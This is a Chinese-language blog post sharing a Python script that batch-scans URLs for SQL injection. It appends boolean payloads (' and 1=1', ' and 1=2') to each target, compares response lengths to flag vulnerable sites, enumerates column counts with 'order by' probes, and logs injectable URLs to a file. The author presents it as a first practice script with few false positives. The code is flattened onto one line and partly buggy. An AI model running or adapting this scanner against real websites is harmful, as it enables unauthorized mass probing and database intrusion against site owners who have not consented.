python批量檢測註入點腳本
阿新 • • 發佈:2017-08-08
err resp utf-8 start odin chan out elif time
# -*- coding:utf-8 -*- def logo(): print (" *** ") print (" * * ") print (" author: * * ") print (" Screw *") print (" ***** ") print (" * ") print (" * * ") print (" blog: * *") print (" *** ") print (" http://www.cnblogs.com/pojun/ ") #運行環境python3.0 批量的話,在本目錄建一個url.txt文件將註入點導入。 import threading import requests i=0 err=‘true‘ exp=[‘ and 1=1‘,‘ and 1=2‘] chang=[] new_str="" #判斷註入點 def judge(): for i in range(2): request=url+exp[i] try: respons1=len(requests.get(request).text) except: print(u"網站有waf,連接被重置!") exit() chang.append(respons1) if(chang[1]!=chang[0]): print(u‘網站======>存在註入!‘) field(url) else: print(u‘網站=======>" 不 "存在註入!‘) #判斷字段(field) def field(weburl): j=0 a1="" a2="" while j<30: j+=1 if(j%2!=0): request=weburl+" order by "+str(j) try: a1=len(requests.get(request,timeout=1).text) except: pass else: request=weburl+" order by "+str(j) try: a2=len(requests.get(request,timeout=1).text) except: print(u"網站有waf,連接被重置!") if(a1!=a2 and j>1): print(u"字段數為========================>",j-1) break #批量 def piliang(): str=open(‘url.txt‘,encoding="utf-8").read() a=str.split(‘\n‘) url_num=len(a) for i1 in range(url_num-1): chang=[] print (a[i1]) for i2 in range(2): request=a[i1]+exp[i2] try: respons1=len(requests.get(request,timeout=1).text) except: global err err=‘false‘ print(u"網站有waf,連接被重置!") break if err==‘true‘: chang.append(respons1) if err==‘true‘: if(chang[1]==chang[0]): print(u‘網站========>" 不 "存在註入!‘) else: print(u‘網站========>存在註入!‘) # field(a[i1]) new_str=a[i1]+‘\n‘ o=open(‘ture_sql.txt‘,‘a‘) o.write(new_str) err=‘true‘ print(u‘1.批量註入,存在本目錄的1.txt 2.單點註入,並判斷字段數 ‘) id=int(input("ID? :")) if(id==1): t1=threading.Thread(target=piliang) t1.start() t1.join() elif(id==2): url=input(‘url :‘) judge() t2=threading.Thread(target=field,args=(url,)) t2.join() else: print(u"輸入錯誤!") logo()
本腳本是在自己學完python練手的第一個腳本,所以結構比較混亂,但是效果還是不錯的。基本沒有誤報!
python批量檢測註入點腳本